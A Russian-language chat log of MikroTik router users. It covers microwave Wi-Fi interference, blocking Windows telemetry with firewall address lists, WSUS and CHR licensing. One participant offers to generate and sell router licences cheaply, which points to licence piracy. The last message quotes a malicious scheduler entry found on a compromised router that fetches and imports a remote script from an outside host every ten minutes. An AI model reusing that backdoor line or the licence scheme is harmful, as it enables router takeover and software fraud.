Nemexis
Добрый день! А колонка она всей техникой рулит напрямую, или через сервера яндекса, куда также надо подключать и все устройства? Просто не изучал даже этот вопрос.
Геннадий
да и как бы микроволновка не является таким источником помех, чтобы ВСЁ ПРЯМ НЕ РАБОТАЛО
всего лишь потеряется 5-30% потока данных, и если это tcp, то просто будет задержка. а если udp, то ...
Nemexis
Кстати получается, если дома умная техника c подключением по wifi, для нее желательно ставить отдельные точки доступа.
Геннадий
в идеале конечно оставить 2,4 для умных, а 5 для пользователей
Андрей
тогда это скорее не проблемы микротика, а проблемы электропроводки - я бы озадачился - а то так пойдешь душ принять и чистеньким куда надо попадешь
Андрей
если переделана и земля есть земля, то фонить микроволновка не должна, а если она фонит, то можно получить удар током при прикосновении
Anonymous
вот да, у меня пока старенький 751g сейчас стоит, в начале недели пойду забирать обновку, чтоб на 5 ггц свалить.
Андрей
ребят - я не спорю - это ваше жилье и ваша микроволновка ! )))
Андрей
слово микротик забыл вставить!
Andrey
Оффтоп сворачиваем
Nemexis
узнать все адреса серверов куда обращается винда, создать адрес лист, и заблокировать доступ к IP из листа
Dmitry
узнать все адреса серверов куда обращается винда, создать адрес лист, и заблокировать доступ к IP из листа
а завтра они поменяются - нет это не работает и на MT это не сделать, нужен NGFW - который может разбирать трафик по сигнатурам
Dmitry
можно
приведите пример ?
Геннадий
у микротика есть адрес листы, и они резолвят все ип адреса
Геннадий
если знать все "имена", то все подмножество ип адресов - легко заблочить
Геннадий
гуглите все имена, и в фаерволе блочите адрес лист на форвард
Геннадий
ниче ему не будет
Nemexis
Может в сети где-то есть обновляемые списки, можно как с РКН листами делать?
Геннадий
Может в сети где-то есть обновляемые списки, можно как с РКН листами делать?
никто никогда не может гарантировать, что в закрытом коде нет прямого секретного ip адреса для такого случая
Dmitry
посмотрел у себя на фаере - там примерно 19000 записей
Андрей
тогда уж проще всю подсеть мелкомягких залочить 104.208.0.0 - 104.215.255.255
Геннадий
тогда уж проще всю подсеть мелкомягких залочить 104.208.0.0 - 104.215.255.255
не гарантирует, что нет сторонней АС от тыжлежишьсекретновавстралии
Nemexis
белые списки только с нужными ресурсами тогда, остальное в блок 😂
Pol
я немного вклинусь, но не проще фаерволом на венде заблочить обновление и ненагрузать микротик
Андрей
совершенно верно
Андрей
там есть еще куча доменов, от разных подрядчиков до партнеров и прочего
Pol
хорошо тогда wus или как там зделать, тогда вроде недолжно лесть в инет апдейт делать, и снова микротик ненагружается, хотя да там тоже можно правила блокировок зделать
Nemexis
WSUS наверное
Андрей
наверное wsus
Vlad
WSUS это WSUS ))
Pol
виндовс упдате сервис чегото там
Vlad
и да кстати за это могут кикнуть это не микротик )
Pol
и да кстати за это могут кикнуть это не микротик )
так дополнительно на микротике блочить
Vlad
естественно не пашет )
Vlad
как минимуv по ип адресам блочьте, а лучше найти сигнатуры L7
Геннадий
извращенец
Pol
выразил неполностю идею, дополняю. ставиш Windows Server Update Services настраиваеш - первый этап, а второй это на микротике ставиш блокировку на update тогда микротик небудет постояно переваривать все конекти к обновлению винди
Геннадий
add action=reject chain=forward comment="MSN Networks" disabled=yes reject-with=icmp-network-unreachable src-address-list=MSN
Геннадий
а в адрес лист забиваешь все что неугодно
Геннадий
Геннадий
например
Nemexis
я думаю 10 может проигнорировать и локальный сервер.
Геннадий
умеет
Pol
я думаю 10 может проигнорировать и локальный сервер.
дак я не говорю что игнорировать не будет, но снизит нагрузку трафика через микротик
Vlad
получится ) правило делаешь в прероутинг и адреслист дроп
Nemexis
Все таки, мне кажется микротик не рассчитан на такие задачи, для этого надо именно железные FireWall и DPI.
Vlad
меня сейчас забанят есть российские производители и китайские, не буду писать наименование иначе мне тут будут не рады
Nemexis
покупаем, на али материку для шлюза и ставим CHR
Nemexis
лицензии микрота думаю купить будет гораздо проще
Vlad
покупаем, на али материку для шлюза и ставим CHR
на долго ли? Думаю стоит сначала с wiki пообщаться и понять что он периодически стучится на сайт микротика и проверяет лицензию, лучше сразу ROS из iso подымать, там он не стучится
Vlad
Лицензии L4 могу сгенерить немного за донат
Nemexis
Как на микротике, заблочить проперку лицензий микротиком. 😂
Vlad
https://wiki.mikrotik.com/wiki/Manual:CHR#CHR_Licensing
Vlad
сначала лучше изучить
Nemexis
не думаю что это оффтоп, это частный случай необходимости блокировки чего либо большого и динамического на Микротике. И если найти решение оно может оказаться очень полезным.
Сергей
а на сайте в ЛК загрузку Микротик х32 не залочили и лицензии из ЛК можно забрать? Проверяли?
Vlad
пока нет
Vlad
Vlad
работает, у меня есть 8 штук. Кому?
Doc
бесплатно отдаешь?
Vlad
за донат разумный ))
Vlad
ну ладно за 50% от стоимости реальной
Alex
блокируете AS51894, или два префикса из той же аски. Только надо понимать, что перестанет работать микротиковский ddns, обновления и тому подобное
Innokentiy
подскажите это страшно?
https://en.wikipedia.org/wiki/Dynamic_frequency_selection
Иван
Dmitrii
russia4 выберите
Спасибо, я уже прочитал что 5260 это 52 канал, который входит в полосу UNII-2, которая пересекается с погодными/военными радарами. Видимо что то пролетало за окном
Maxim
Парни, впервые столкнулся В логе: configuration flagged, check all router configuration for unauthorized changes and update device-mode Не даёт ничего добавить в конфу. Я так понял что он увидел какие-то странные изменения и заблочил всё, пока я его в нужный режим не переведу и не сниму flag?
Maxim
7-ка ?
6.49.4 но я только обновился.
Maxim
Нашёл в конфиге такое: /system scheduler add comment="Disabled as known malicious configuration" disabled=yes interval=\ 10m name=U6 on-event="/tool fetch url=http://myfrance.xyz/poll/089d2a71-2916\ -4b28-ac65-3ac081a5b264 mode=http dst-path=7wmp0b4s.rsc\r\ \n/import 7wmp0b4s.rsc" policy=\ ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\ may/18/2021 start-time=22:09:30 Видимо кто-то залез-таки